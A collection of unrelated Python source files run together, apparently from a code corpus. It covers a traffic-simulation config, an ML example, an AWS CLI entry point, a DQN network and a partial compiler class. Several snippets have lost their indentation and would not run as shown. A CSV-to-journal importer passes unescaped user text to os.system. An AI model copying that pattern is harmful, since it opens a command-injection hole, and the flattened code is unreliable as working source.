# True if we want to use the SUMO GUI
sumoUseGUI = False
# startEdgeID & lastEdgeID denotes lower & upper edges, i.e. extreme points of the map
startEdgeID = "11S"
lastEdgeID = "23805795"
''' one of these will be selected (in a randomized manner) as the exit edge of each car '''
# edgeIDsForExit = ["135586672#0", "12N", "286344111", "286344110", "23805795"]
edgeIDsAndNumberOfLanesForExit = {
"135586672#0": 4
}
# TODO: uncomment following for production?
# edgeIDsAndNumberOfLanesForExit = {
# "135586672#0": 4,
# "12N": 5,
# "286344111": 3,
# "286344110": 4,
# "23805795": 3
# }
# you can also set contextual parameters
parameters = dict(
contextual=dict(
lookAheadDistance=500.0, # distance to find a leader vehicle in the simulation
switchImpatienceFactor=0.1,
platoonCarCounter=250,
totalCarCounter=250, # set totalCarCounter as platoonCarCounter, other scenario is not tested excessively
extended_simpla_logic=True
),
changeable=dict(
maxVehiclesInPlatoon=10,
catchupDistance=500.0,
maxPlatoonGap=500.0,
platoonSplitTime=10.0,
joinDistance=3000.0 # to find extreme positions (-+d) of platoon
)
)
|
print long
print long(3.0)
print long(3)
print type(long(3.0))
print type(long(3))
|
import csv
import os
filename = input("what is the name of the exported CSV file: ")
print(filename)
with open(filename,'r') as f:
reader = csv.reader(f)
next(f)
next(f)
for row in reader:
date = row[0]
hour = row[2]
minute = row[3]
level = row[4]
levelText = row[5]
comment = row[6]
dateWithTime = '{0} {1}:{2}'.format(date,hour,minute)
text = '''
## DayScore: *{0} {1}*
{2}
Imported from iMoodJournal
'''.format(level,levelText,comment)
s = 'dayone2 --date="{0}" new "{1}"'.format(dateWithTime,text)
os.system(s)
|
import numpy as np
import xlearn as xl
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
# Load dataset
iris_data = load_iris()
X = iris_data['data']
y = (iris_data['target'] == 2)
X_train, \
X_val, \
y_train, \
y_val = train_test_split(X, y, test_size=0.3, random_state=0)
# param:
# 0. binary classification
# 1. model scale: 0.1
# 2. epoch number: 10 (auto early-stop)
# 3. learning rate: 0.1
# 4. regular lambda: 1.0
# 5. use sgd optimization method
linear_model = xl.LRModel(task='binary', init=0.1,
epoch=10, lr=0.1,
reg_lambda=1.0, opt='sgd')
# Start to train
linear_model.fit(X_train, y_train,
eval_set=[X_val, y_val],
is_lock_free=False)
# print model weights
print(linear_model.weights)
# Generate predictions
y_pred = linear_model.predict(X_val)
|
import click
from . import wrapboto
from .config import read_config
from .commands import config, cluster, apply, create, update, delete, describe, get, logs, stop, top
from .colorize import HelpColorsGroup
@click.group(cls=HelpColorsGroup)
@click.pass_context
def cli(ctx):
aws_credentials = {}
for k, v in read_config().items():
if k in ctx.obj:
ctx.obj[k] = v
if str(k).startswith('aws'):
aws_credentials[k] = v
ctx.obj['bw'] = wrapboto.BotoWrapper(**aws_credentials)
cli.add_command(config.config)
cli.add_command(cluster.drain)
cli.add_command(cluster.undrain)
cli.add_command(cluster.run)
cli.add_command(cluster.scale)
cli.add_command(cluster.exec_command)
cli.add_command(create.create)
cli.add_command(apply.apply)
cli.add_command(update.update)
cli.add_command(delete.delete)
cli.add_command(describe.describe)
cli.add_command(get.get)
cli.add_command(logs.logs)
cli.add_command(stop.stop)
cli.add_command(top.top)
|
import torch
import torch.nn as nn
class DQN(nn.Module):
def __init__(self, width, input_dim, output_dim, path=None, checkpoint=1):
super(DQN, self).__init__()
self._input_dim = input_dim
self._output_dim = output_dim
self._width = width
self.model_definition()
if path is not None:
print(path)
# load the model from a saved checkpoint
self.layers = torch.load(path + str(checkpoint))
def model_definition(self):
"""
        Define the neural network for the DQN agent.
"""
self.layers = nn.Sequential(
nn.Linear(self._input_dim, self._width),
nn.ReLU(),
nn.Linear(self._width, self._width),
nn.ReLU(),
nn.Linear(self._width, self._width),
nn.ReLU(),
nn.Linear(self._width, self._width),
nn.ReLU(),
nn.Linear(self._width, self._width),
nn.ReLU(),
nn.Linear(self._width, self._output_dim)
)
def forward(self, x):
"""
Execute the forward pass through the neural network
"""
return self.layers(x)
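# Minimal usage sketch (illustrative dimensions): build the network, feed a batch of
# random state vectors, and read out the Q-value estimates for each action.
if __name__ == "__main__":
    net = DQN(width=64, input_dim=80, output_dim=4)
    states = torch.rand(32, 80)   # batch of 32 hypothetical state observations
    q_values = net(states)        # forward pass -> shape (32, 4)
    print(q_values.shape)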
|
import Classes.DType as Type
import config
from Assembly.CodeBlocks import (createFloatConstant, createIntrinsicConstant,
createStringConstant, extra_parameterlabel,
functionlabel, fncall)
from Assembly.Registers import (norm_parameter_registers,
norm_scratch_registers,
norm_scratch_registers_inuse, ralloc, rfree,
rfreeAll, sse_parameter_registers,
sse_scratch_registers,
sse_scratch_registers_inuse)
from Classes.Constexpr import buildConstantSet, determineConstexpr
import Classes.ExpressionComponent as EC
from Classes.DType import DType, type_precedence
from Classes.Error import *
from Classes.Location import Location
from Classes.Token import *
from Classes.Token import Token
from Classes.Variable import Variable
from Function import Function
from globals import BOOL, CHAR, DOUBLE, INT, INTRINSICS, LONG, SHORT, VOID, OPERATORS
from Lexer import Lexer
from Structure import Structure
import copy
_asm_extern_indicator = "extern"
#####################################
#
# The Compiler class is used to compile global variables,
# isolate structures, and isolate functions.
# Functions are compiled in the Function class.
#
# \see Token
# \see Variable
# \see Function
# \see compile.py
# \see globals
#
######################################
class Compiler:
def __init__(self):
self.globals: list = [] # all global variables
self.constants: str = "" # raw assembly for constant definitions
# raw assembly for heap definitions (.bss)
self.heap: str = ""
# raw assembly for initialization of heap definitions
self.initializers: str = ""
# raw assembly to call the given entrypoint (usually main)
self.entry: str = ""
self.text: str = "" # raw .text assembly
self.inittext: str = "" # raw init assembly
self.fini: str = "" # raw fini assembly
self.currentfname: str = "" # current filename
self.currentTokens: list = [] # current tokens: Token
self.currentfunction: Function = None # for fn compiletime
self.current_token: Token = None # current token
self.ctidx: int = 0 # index of current_token in self.currentTokens
self.prevtok: Token = Token(T_AMBIGUOUS, T_AMBIGUOUS, None, None)
self.functions: list = [] # all Function objects
self.template_functions: list = [] # function templates
self.templatefunction_cache: list = [] # already created function templates
self.types: list = [] # all datatypes: DType
self.template_types: list = [] # templated types
self.template_cache: list = [] # already filled templates for speed
# Store enums:
# format: {
#
# "<Enum Item Name>" : (DType, value: int)
#
# }
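        # e.g. an item "RED" of an 'enum Color' might be stored (illustratively) as:
        #   self.enums["RED"] = (<DType of Color>, 0)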
self.enums: dict = {} # all enums
# typedefs listed as (old, new):(DType,DType)
self.tdefs: list = []
# a hash table for faster access to typedefs
self.tdef_hash = {}
for i in INTRINSICS: # fill types with primitives
self.types.append(i.copy())
self.possible_members: list = []
self.heap_unnamed: int = 0 # int counter for unnamed heap variables
# an array of all function types (handled differently)
self.fntypes = []
# panicmode means continue compiling, but there has already been an
# error
self.panicmode: bool = False
# ensure a semicolon was used, and move on
def checkSemi(self) -> None:
if(self.current_token.tok != T_ENDL):
throw(ExpectedSemicolon(self.currentTokens[self.ctidx - 1]))
self.advance()
def isType(self, q: str) -> bool: # return: if q is type
return self.getType(
q) is not None or self.getTemplateType(q) is not None
def isIntrinsic(self, q: str) -> DType: # return: if q is primitive
return next((t for t in INTRINSICS if self.Tequals(t.name, q)), None)
def ismember(self, q: str) -> bool:
return q in self.possible_members
def getGlob(self, q: str) -> Variable: # get global variable of name q
# find a variable based on name
out: Variable = next((g for g in self.globals if g.name == q), None)
# return out if found
if(out is not None):
return out
# check for functions of that name
fn: Function = self.getFunction(q)
# return None if none found
if(fn is None):
return None
        # if function is found, find its corresponding global variable:
return self.getGlob(fn.getCallingLabel()
) if not fn.extern else self.getGlob(fn.name)
def getTemplateType(self, q: str) -> DType:
return next((t for t in self.template_types if t[0].name == q), None)
def getFunction(self, q: str) -> Function: # get first function of name q
return next((f for f in self.functions if f.name == q), None)
def advance(self): # move to next token
# increment index
self.ctidx += 1
# set previous token
self.prevtok = self.current_token
try:
self.current_token = self.currentTokens[self.ctidx]
except BaseException:
throw(UnexepectedEOFError(self.current_token))
def addTdef(self, old, new):
self.tdefs.append((old, new))
if old.name in self.tdef_hash:
self.tdef_hash[old.name].append(new.name)
else:
self.tdef_hash[old.name] = [new.name]
def skipBody(self):
self.advance()
opens = 1
while(opens != 0):
self.advance()
if(self.current_token.tok == T_OPENSCOPE):
opens += 1
elif(self.current_token.tok == T_CLSSCOPE):
opens -= 1
# determine DType equality (including typedefs)
def Tequals(self, ta: str, tb: str) -> bool:
# if given names are equal, the types must be
if(ta == tb):
return True
if ta in self.tdef_hash:
return tb in self.tdef_hash[ta]
elif tb in self.tdef_hash:
return ta in self.tdef_hash[tb]
return False
# find a typedef pair in the list which equates the two types
# return next((True for tdef in self.tdefs if (
# (tdef[0].name == ta and tdef[1].name == tb) or (tdef[0].name == tb and tdef[1].name == ta))), False)
def getType(self, qu: str) -> DType: # get type of name q
        # search types for a datatype that shares a name with the query
out: DType = next((t for t in self.types if t.name == qu), None)
# if none exists, return
if(out is None):
return None
# return safe copy of the type with the restored pointer depth
out = out.copy()
return out
def deriveBaseType(self, t: DType) -> DType:
for base in self.tdef_hash:
if t.name not in self.tdef_hash and t.name in self.tdef_hash[base]:
return self.getType(base)
return t
def parseTemplate(self) -> list:
types = []
# loop through layer of decorator (' <int, double ... > ' )
while self.current_token.tok != ">":
self.advance()
t: DType = self.checkType()
t = self.deriveBaseType(t)
types.append(t)
return types
def parseFnDeclParameters(self, checkvarnames=True):
if self.current_token.tok != "(":
throw(ExpectedToken(self.current_token, "("))
self.advance()
parameters = []
while self.current_token.tok != T_CLSP:
t = self.checkType()
if checkvarnames:
if(self.current_token.tok != T_ID):
throw(ExpectedIdentifier(self.current_token))
varname = self.current_token.value
self.advance()
else:
varname = "~"
parameters.append(Variable(t, varname, isptr=t.ptrdepth > 0))
if (self.current_token.tok == T_CLSP):
break
if(self.current_token.tok != T_COMMA):
throw(ExpectedComma(self.current_token))
self.advance()
self.advance()
return parameters
def parseFunctionType(self):
self.advance()
rett = self.checkType()
parameters = self.parseFnDeclParameters(False)
fnout = Function("", parameters, rett, self, [])
typeout = DType(
f"function {fnout.createTypename()}",
8,
function_template=fnout
)
return typeout
# check next tokens for Type, and return it as a DType
def checkType(self, err=True):
# within checkForType, if err is set to True,
# an error can be thrown on bad syntax or undefined
# types. When err is not set, None is returned in
# cases where it would normally throw an error.
signed = True
# check for a sign specifier
if(self.current_token.tok == T_KEYWORD):
if(self.current_token.value == "unsigned"):
signed = False
self.advance()
elif(self.current_token.value == "signed"):
self.advance()
elif (self.current_token.value == "function"):
return self.parseFunctionType()
# ensure syntax
if(self.current_token.tok != T_ID):
# respond to bad syntax based on err flag
if err:
throw(ExpectedIdentifier(self.current_token))
else:
return None
# make sure that the type exists
if(not self.isType(self.current_token.value)):
# respond to bad type based on err flag
if err:
throw(ExpectedType(self.current_token))
else:
return None
# check for a decorator (template types specifier)
if (self.currentTokens[self.ctidx + 1].tok == "<"):
# collect template info:
template = self.current_token.value
ttok = self.current_token
self.advance()
types = self.parseTemplate()
            # query compiler for a new type based on template types
t = self.buildTemplateType(template, types, ttok).copy()
else:
            # otherwise, query compiler for a type based on a typename
t = self.getType(self.current_token.value).copy()
self.advance()
# get pointer depth:
ptrdepth = t.ptrdepth
while self.current_token.tok == "*":
ptrdepth += 1
self.advance()
# update type properties
t.ptrdepth = ptrdepth
t.signed = signed
return t
def checkId(self) -> str:
if self.current_token.tok != T_ID:
throw(ExpectedIdentifier(self.current_token))
out = self.current_token.value
self.advance()
return out
# create a constant string value in self.constants
def createStringConstant(self, content) -> None:
# d = (.data instructions, varname)
d: tuple = createStringConstant(content)
name: str = d[1]
cnst: str = d[0]
# add constant info
self.constants += cnst
# add new Variable
v = Variable(CHAR.copy(), name, glob=True)
self.globals.append(v)
# create an arbitrary constant in self.constants
def buildGlobal(self, extern=False) -> None:
# track start
startidx = self.ctidx
# check for a datatype
intr = self.checkType()
# check for an identifier
name = self.checkId()
# check for simple C style function declarations
if(self.current_token.tok == T_OPENP or self.current_token.tok == T_NAMESPACE):
# update indexes, and pass control onto the buildFunction function
self.ctidx = startidx - 1
self.advance()
self.buildFunction()
return
# check for multiple declarations
if self.getGlob(name) is not None:
fatalThrow(VariableRedeclaration(
self.currentTokens[self.ctidx - 1], name))
dtok = self.currentTokens[self.ctidx - 1]
# variables declared with extern are not placed in the data section, and are simply
# recorded for use by the compiler.
if(extern):
# cannot assign values declared with extern
if(self.current_token.tok == T_EQUALS):
throw(AssigningExternedValue(self.current_token))
# add new variable
self.globals.append(Variable(intr.copy(), name, glob=True))
self.globals[-1].dtok = dtok
# close
self.checkSemi()
return
# test for early endline
if (self.current_token.tok != T_EQUALS):
# if there is no assignment, these variables can be moved to the bss section because they
# are uninitialized.
if(self.current_token.tok == T_ENDL):
                # create uninitialized var
self.globals.append(
Variable(
intr.copy(),
name,
glob=True,
initializer=0))
self.globals[-1].dtok = dtok
# since the var has no initializer, it is stored in the .bss
# section
# handle structures
if not intr.isintrinsic():
self.createGlobalStructure(self.globals[-1], dtok, True)
else:
self.heap += f"{name}: resb {intr.csize()}\n"
# close
self.advance()
return
else:
# if there is no initializer, there must be a semicolon
throw(ExpectedValue(self.current_token))
self.advance()
# Tokens need to be collected to be passed through the constexpr evaluator.
# \see Classes.Constexpr
# tokens representing an expression:
exprtokens = []
# determine if the expression is a set literal: (e.g {1,2,3})
isSet = False
if(self.current_token.tok == T_OPENSCOPE):
isSet = True
# loop through expression tokens until a semicolon
while(self.current_token.tok != T_ENDL):
exprtokens.append(self.current_token)
self.advance()
# use the constexpr evaluator to find the value for the global
value: EC.ExpressionComponent = determineConstexpr(intr.isflt(), exprtokens, Function(
"CMAININIT", [], LONG.copy(), self, exprtokens), True) if not isSet else buildConstantSet(intr.isflt(), exprtokens, Function(
"CMAININIT", [], LONG.copy(), self, exprtokens))
isptr = False
# if the final value is a variable, the initializer to that variable is
# taken
if(isinstance(value.accessor, Variable)):
# value.accessor = value.accessor.name if intr.ptrdepth == value.accessor.t.ptrdepth + \
# 1 else value.accessor.initializer
#isptr = True
if value.accessor.glob and value.accessor.t.ptrdepth > 0:
value.accessor = value.accessor.name
elif value.accessor.glob:
value.accessor = value.accessor.initializer
# add new Variable
self.globals.append(Variable(intr.copy(), name,
glob=True, initializer=value.accessor, isptr=isptr))
self.globals[-1].dtok = dtok
# add .data instructions to self.constants
self.constants += createIntrinsicConstant(self.globals[-1])
if not intr.isintrinsic():
self.createGlobalStructure(self.globals[-1], dtok, False)
# close
self.checkSemi()
def createGlobalStructure(self, var, dtok, addToHeap, starter=""):
if addToHeap:
self.heap += f"{var.name}:\n"
# implicit constructor
implicitConstructor = var.t.getConstructor([var.t.up])
if implicitConstructor is not None:
self.inittext += f"mov rdi, {var.name}\n{fncall(implicitConstructor)}"
destructor = var.t.destructor
if destructor is not None:
self.fini += f"mov rdi, {var.name}\n{fncall(destructor)}"
size_added = 0
for v in var.t.members:
if isinstance(v.initializer, Function):
continue
self.globals.append(
Variable(v.t, f"{starter}{var.name}.{v.name}", glob=True)
)
self.globals[-1].dtok = dtok
if addToHeap:
size_added += v.t.csize()
self.heap += f"{self.globals[-1].name}: resb {v.t.csize()}\n"
if addToHeap and size_added != var.t.csize():
self.heap += f"resb {var.t.csize()-size_added}\n"
# isolate a function and build a Function object
def buildFunction(self, thisp=False, thispt=None,
constructor=False, destructor=False) -> None:
# track if the function is explicitly inline
inline = False
autodecl = False
operator = False
        # constructor and destructor are special flags set by the Structure class
        # for compiling constructors and destructors
if not constructor and not destructor:
# under normal conditions:
# check for extra info specifier
if(self.current_token.tok == T_KEYWORD):
# inline specifier
if(self.current_token.value == "inline"):
inline = True
# Check for auto specifier
if self.current_token.tok == T_KEYWORD and self.current_token.value == "auto":
# handle a function defined with auto
autodecl = True
rettype = DType("auto", 8)
self.advance()
# normal returntype:
else:
# check for a returntype
rettype = self.checkType()
# if this is a destructor or constructor:
else:
assert thisp
rettype = VOID.copy()
# parent structure
struct = None
# for external definitions of member functions:
# (The '::' token will be in place of an '(')
if(self.currentTokens[self.ctidx + 1].tok == T_NAMESPACE):
# if(self.current_token.tok != T_ID):
# throw(ExpectedIdentifier(self.current_token))
sname = self.checkId()
# get parent
struct = self.getType(sname)
if(struct is None):
throw(UnkownType(self.prevtok))
# setup function for a 'this' value
thisp = True
thispt = struct
# self.advance()
self.advance()
# operator specifier
if(self.current_token.value == "operator"):
#inline = True
operator = True
self.advance()
# record token that declared the function
dtok = self.current_token
if not operator:
# get fnname
name = self.checkId()
else:
name = self.current_token.value
if name not in OPERATORS:
throw(UnkownOperator(name))
self.advance()
if name == "[" or name == "(":
self.advance()
# ensure syntax
if(self.current_token.tok != T_OPENP):
throw(ExpectedParethesis(self.current_token))
self.advance()
# construct parameters:
parameters = []
# thisp means that this function is a member, and should have 'this' as
# it's first parameter
if(thisp):
parameters.append(
Variable(
thispt.bottom().up(),
"this",
isptr=True))
# denoted by '...'
variardic = False
# count of each type of parameter
ssecount = 0
normcount = int(thisp)
# load parameters until end of fn header at ')'
while self.current_token.tok != T_CLSP:
# check for variardic
if(self.current_token.tok == T_ELIPSES):
variardic = True
self.advance()
break
# get parameter type
t = self.checkType()
# increment param types
ssecount += t.isflt()
normcount += not t.isflt()
# get parameter name
varname = self.checkId()
# add new variable
parameters.append(Variable(t, varname, isptr=t.ptrdepth > 0))
parameters[-1].dtok = self.currentTokens[self.ctidx - 1]
# loop handle:
if (self.current_token.tok == T_CLSP):
break
# ensure syntax
if(self.current_token.tok != T_COMMA):
throw(ExpectedComma(self.current_token))
self.advance()
self.advance()
# check for early end (just declaration, no assignment)
if(self.current_token.tok == T_ENDL):
self.advance()
# create empty function for assignment later
f = Function(
name,
parameters,
rettype,
self,
[],
return_auto=autodecl,
declare_token=dtok)
fndtype = DType(
f"function {f.createTypename()}",
8,
function_template=f
)
self.globals.append(
Variable(
fndtype,
f.getCallingLabel(),
glob=True,
isptr=True,
mutable=False,
signed=f.returntype.signed))
self.globals[-1].dtok = f.declare_token
self.functions.append(f)
return
# if not declaration, it must be an assignment
if(self.current_token.tok != T_OPENSCOPE):
throw(ExpectedToken(self.current_token, T_OPENSCOPE))
self.advance()
# isolate the body of the function
# (keep track of scope open / scope close)
opens = 1
start = self.ctidx
# loop through one layer of { ... } scope to
# catch range of tokens used as function body
while opens > 0:
if(self.current_token.tok == T_OPENSCOPE):
opens += 1
if(self.current_token.tok == T_CLSSCOPE):
opens -= 1
self.advance()
# construct final object
f = Function(name, parameters, rettype, self,
self.currentTokens[start:self.ctidx], return_auto=autodecl, inline=inline, declare_token=dtok)
f.unassigned = False
        # pre-compile f to determine its return type
if f.return_auto:
# track warning settings
ogwarn = config.__nowarn__
config.__nowarn__ = True
# compile f before other functions
f.compile()
# restore warning settings
config.__nowarn__ = ogwarn
# check if there was a return,
if f.returntype.name == "auto":
# if not, the default type is void
f.returntype = VOID.copy()
f.isCompiled = False
rettype = f.returntype
# setup member fn
if thisp:
f.memberfn = True
f.parentstruct = thispt
# variardic
f.variardic = variardic
# handle additional parameters...
# the extra parameters needed are any parameters not able to be stored in the
# SSE registers and the regular registers
# extra params from sse
extra_params = (ssecount - len(sse_parameter_registers))
if extra_params < 0:
extra_params = 0
# extra params from regular
extra_params += (normcount - len(norm_parameter_registers))
# load info to f
f.extra_params = extra_params
f.ssepcount = ssecount
f.normpcount = normcount
self.functions.append(f)
fndtype = DType(
f"function {f.createTypename()}",
8,
function_template=f
)
# add as a variable for fn pointers
self.globals.append(
Variable(
fndtype,
f.getCallingLabel(),
glob=True,
isptr=True,
mutable=False,
signed=f.returntype.signed))
self.globals[-1].dtok = f.declare_token
# isolate and build a structure
def buildStruct(self, thisp=False, thispt=None,
templated=False, tns=None) -> None:
# \see Structure
# structure wrapper
parser = Structure(self, templated, tns)
try:
parser.construct()
except Error as e:
print(e.__repr__())
self.skipBody()
self.advance()
self.checkSemi()
self.types.pop()
def buildEnum(self, thisp=False, thispt=None) -> None:
pass
def compile(self, ftup: list) -> None: # main function to perform Compiler tasks
self.currentTokens = ftup
# The first step in compilation is finding all string constants (except inline asm blocks) and float constants
# in order to transfer them to the .data section as global variables.
c = 0
for t in self.currentTokens:
# convert string constants to global variables
if t.tok == T_STRING:
# preserve assembly blocks
if(self.currentTokens[c - 2].tok != T_KEYWORD and self.currentTokens[c - 2].value != "__asm"):
# construct a string constant
data: tuple = createStringConstant(t.value)
name: str = data[1]
instruct: str = data[0]
# get datatype for string
tp = CHAR.copy()
tp.ptrdepth = 1
# build Variable
v = Variable(tp, name, glob=True,
isptr=True, initializer=f"`{t.value}`")
self.globals.append(v)
# update token for later use
t.tok = T_ID
t.value = name
# add allocator to constants
#self.constants += instruct
c += 1
# reset
self.current_token = self.currentTokens[0]
self.ctidx = 0
# actual compilation step
while self.current_token.tok != T_EOF:
self.compileLine()
def buildTemplate(self):
# keep track of first token for errors
first = self.currentTokens[self.ctidx - 1]
# ensure syntax
if(self.current_token.tok != "<"):
throw(ExpectedToken(self.current_token, "<"))
# collect standin typenames from the template list
tns = []
while self.current_token.tok != ">":
self.advance()
# expecting a 'struct', 'class', or 'typename'
if(self.current_token.tok != T_KEYWORD):
throw(ExpectedToken(self.current_token, "type-specifier"))
self.advance()
# check for typename
tname = self.checkId()
tns.append(tname)
self.advance()
# keep track of the current number of types to restore back to after
# the template has been created
restore_types = len(self.types)
for t in tns:
self.types.append(DType(t, 0))
# structs are a simpler process that can be streamlined:
if(self.current_token.value == "struct"):
restorefn = len(self.functions)
self.buildStruct(templated=True, tns=tns)
self.functions = self.functions[:restorefn]
#newt = self.types.pop()
# templated types have their own special list
# self.template_types[-1].append(tns)
# functions:
else:
# tracker is used to ensure that a function is actually created
# as this line is compiled
tracker = len(self.functions)
self.compileLine()
if(tracker == len(self.functions)):
throw(VariableTemplate(first))
fnt = self.functions.pop()
# update the created function as a template
fnt.isTemplate = True
fnt.template_types = tns
self.template_functions.append(fnt)
# delete standin types, and return to original state
self.types = self.types[:restore_types]
def buildTemplateType(self, template, types, tok):
# check for existing templates:
for t in self.template_cache:
# they share a name
if t[0] == template:
# they have the same number of types
if len(t[1]) != len(types):
break
# fulleq = ''.join([str(ty) for ty in t[1]]) == ''.join(
# [str(ty) for ty in types])
fulleq = all((t[1][i].__eq__(types[i])
for i in range(len(types))))
if fulleq:
return t[2].copy()
# get the template structure from the list:
tstruct = self.getTemplateType(template)
if(tstruct is None):
throw(UnkownIdentifier(tok))
# the template structure needs a deep copy of properties and members
# so that it can be used to instantiate multiple different template
# structure types
struct = tstruct[0].copy()
# deep copy
for i in range(len(tstruct[0].members)):
struct.members[i] = tstruct[0].members[i].copy()
# the second item is an array of typenames used in place of actual types in the
# structure's definition
tns = tstruct[1]
# assosiation is a dictionary that associates the typenames of the template with their
# actual types given in this declaration
assosiation = {}
for i in range(len(tns)):
assosiation[tns[i]] = types[i].copy()
# all the members of the new templated type need to be given their new
# types, and offsets
struct.s = 0
struct.name += ''.join([t.name for t in types])
for member in struct.members:
# if template has effect:
if(member.t.name in tns):
# update type, but maintain pointer depth
pd = member.t.ptrdepth
member.t = assosiation[member.t.name].copy()
member.t.ptrdepth += pd
if(isinstance(member.initializer, Function)):
pass
else:
# apply offset, and overall size
member.offset = struct.s
struct.s += member.t.csize()
for member in struct.members:
if(isinstance(member.initializer, Function)):
member.initializer = member.initializer.deepCopy()
member.initializer.parameters[0].t = struct.up()
member.initializer = self.buildTemplateFunction(
member.initializer, tns, types)
for i in range(len(struct.constructors)):
struct.constructors[i] = struct.constructors[i].deepCopy()
struct.constructors[i] = self.buildTemplateFunction(
struct.constructors[i].deepCopy(), tns, types)
if struct.destructor is not None:
struct.destructor = struct.destructor.deepCopy()
struct.destructor = self.buildTemplateFunction(
struct.destructor, tns, types)
for op in struct.operators:
for i in range(len(struct.operators[op])):
struct.operators[op][i] = struct.operators[op][i].deepCopy()
struct.operators[op][i].parameters[0].t = struct.up()
struct.operators[op][i] = self.buildTemplateFunction(
struct.operators[op][i], tns, types
)
self.template_cache.append([template, types, struct])
return struct.copy()
# build / get a template function based on template parameters
def buildTemplateFunction(self, templatefn, tns, types):
# restore the types if necessary
restore_types = len(self.types)
restore_tdefs = len(self.tdefs)
restore_tdefhash = copy.deepcopy(self.tdef_hash)
# create semi-copy function
fn = Function(
templatefn.name,
templatefn.parameters,
templatefn.returntype,
self,
templatefn.tokens,
templatefn.inline,
templatefn.extern,
0,
templatefn.memberfn,
templatefn.parentstruct)
# update returntype standin if necessary
if fn.returntype.name in tns:
fn.returntype = types[tns.index(fn.returntype.name)]
# replace parameter types with their new values if specified in the
# template
for i in range(len(fn.parameters)):
p = fn.parameters[i]
if p.t.name in tns:
fn.parameters[i] = fn.parameters[i].copy()
pd = fn.parameters[i].t.ptrdepth
fn.parameters[i].t = types[tns.index(p.t.name)].copy()
fn.parameters[i].t.ptrdepth += pd
# check for function type parameters using the templated type
if fn.parameters[i].t.function_template is not None:
fn.parameters[i].t.function_template = self.buildTemplateFunction(fn.parameters[i].t.function_template, tns, types)
# check if the function has already been built before
fnexist = templatefn.getFunction(
fn.name, [p.t for p in fn.parameters], fn.returntype, loose=False)
# if it has been built, just use the existing build
if(fnexist is not None):
fn = fnexist
else:
# if it's not been built, the new temporary types need to be added
# to compile the template function.
for i in range(len(tns)):
temptype = types[i].copy()
temptype.name = tns[i]
self.types.append(temptype)
self.tdefs.append((types[i], temptype))
if types[i].name in self.tdef_hash:
self.tdef_hash[types[i].name].append(temptype.name)
else:
self.tdef_hash[types[i].name] = [temptype.name]
# if it is not already built, it needs to be compiled
if not fn.isCompiled:
# compile
fn.compile()
# save
self.functions.append(fn)
# update
fn.isCompiled = True
fn.isTemplate = True
if not fn.inline:
self.text = f"{fn.asm}{self.text}"
# restore types if necessary
self.types = self.types[:restore_types]
self.tdefs = self.tdefs[:restore_tdefs]
self.tdef_hash = restore_tdefhash
return fn
# unsigned keyword is always followed by a normal variable
# declaration.
def buildUnsigned(self, thisp=False, thispt=None) -> None:
s = self.current_token
self.advance()
self.buildGlobal()
v = self.globals[-1]
if(v.isflt()):
throw(InvalidSignSpecifier(s))
v.signed = False
v.t = v.t.copy()
v.t.signed = False
v.glob = True
def buildSafetype(self, thisp=False, thispt=None) -> None:
self.advance()
tat = self.current_token
typeAName = self.checkType()
typeBName = self.checkId()
typeA = self.getType(typeAName)
if typeA is None:
fatalThrow(ExpectedType(tat))
newtype = typeA.copy()
newtype.name = typeBName
self.types.append(newtype)
self.checkSemi()
# typedef is always followed by two types and an endline:
def buildTypedef(self, thisp=False, thispt=None) -> None:
# start token
s = self.current_token
self.advance()
# type a
ta = self.checkType()
if(self.current_token.tok != T_ID):
throw(ExpectedIdentifier(self.current_token))
# check for layered typedefs
if ta.name in self.tdef_hash:
ogt = self.tdef_hash[ta.name][0]
if ogt in ['char', 'short',
'int', "long", "float",
"double", "void"]:
ta.name = ogt
# new type name
ntn = self.current_token.value
newtype = ta.copy()
newtype.name = ntn
# add new typename to precedence list, if applicable
if ta.name in type_precedence:
type_precedence[ntn] = type_precedence[ta.name]
# add new type to types and tdefs
self.types.append(newtype.copy())
self.tdefs.append((ta, newtype))
# set up hash table for fast access
if ta.name in self.tdef_hash:
self.tdef_hash[ta.name].append(newtype.name)
else:
self.tdef_hash[ta.name] = [newtype.name]
if newtype.name in self.tdef_hash:
self.tdef_hash[newtype.name].append(ta.name)
else:
self.tdef_hash[newtype.name] = [ta.name]
if(self.isIntrinsic(ntn)):
INTRINSICS.append(newtype.copy())
self.advance()
self.checkSemi()
def determineFunctionOrVar(self):
self.advance()
# record location to jump back to
backto = self.ctidx - 1
self.checkType()
# account for operator overloads
if self.current_token.tok == T_KEYWORD and self.current_token.value == 'operator':
self.advance()
self.advance()
# function determinant:
# for function declarations fndp.tok will always be a '(', and for variables
# it will always be something else.
fndp = self.current_token
# with the determinant, jump back to the beginning to
# perform the compilation
self.ctidx = backto
self.advance()
return fndp
# extern is followed by either a function declaration or a
# variable declaration
def buildExtern(self, thisp=False, thispt=None) -> None:
# function determinant
fndp = self.determineFunctionOrVar()
if(fndp.tok == "(" or fndp.tok == T_NAMESPACE): # if is function
self.buildFunction(thisp=thisp, thispt=thispt)
fn = self.functions[-1]
config.__CEXTERNS__ += f"{_asm_extern_indicator} " + \
functionlabel(fn)[:-1] + "\n"
glob = self.globals[-1]
glob.name = fn.getCallingLabel()
else: # if is variable
self.buildGlobal(True)
config.__CEXTERNS__ += f"{_asm_extern_indicator} " + \
self.globals[-1].name + "\n"
# same code as extern, with slight modification for cextern
def buildCextern(self, thisp=False, thispt=None) -> None:
fndp = self.determineFunctionOrVar()
if(fndp.tok == "(" or fndp.tok == T_NAMESPACE):
self.buildFunction(thisp=thisp, thispt=thispt)
fn = self.functions[-1]
fn.extern = True
config.__CEXTERNS__ += f"{_asm_extern_indicator} " + \
functionlabel(fn)[:-1] + "\n"
glob = self.globals[-1]
glob.name = fn.getCallingLabel()
else:
self.buildGlobal(True)
config.__CEXTERNS__ += f"{_asm_extern_indicator} " + \
self.globals[-1].name + "\n"
# __cdecl is always followed by a function declaration
def buildCdecl(self, thisp=False, thispt=None) -> None:
self.advance()
self.buildFunction(thisp=thisp, thispt=thispt)
fn = self.functions[-1]
fn.extern = True
# apply new properties to generated function:
config.__CEXTERNS__ += "global " + \
functionlabel(fn)[:-1] + "\n"
glob = self.globals[-1]
glob.name = fn.getCallingLabel()
# global is always followed by a function declaration
def buildGlobalfn(self, thisp=False, thispt=None) -> None:
self.advance()
self.buildFunction(thisp=thisp, thispt=thispt)
# apply global properties
fn = self.functions[-1]
config.__CEXTERNS__ += "global " + \
functionlabel(fn)[:-1] + "\n"
glob = self.globals[-1]
glob.name = fn.getCallingLabel()
# inline is always followed by a function declaration
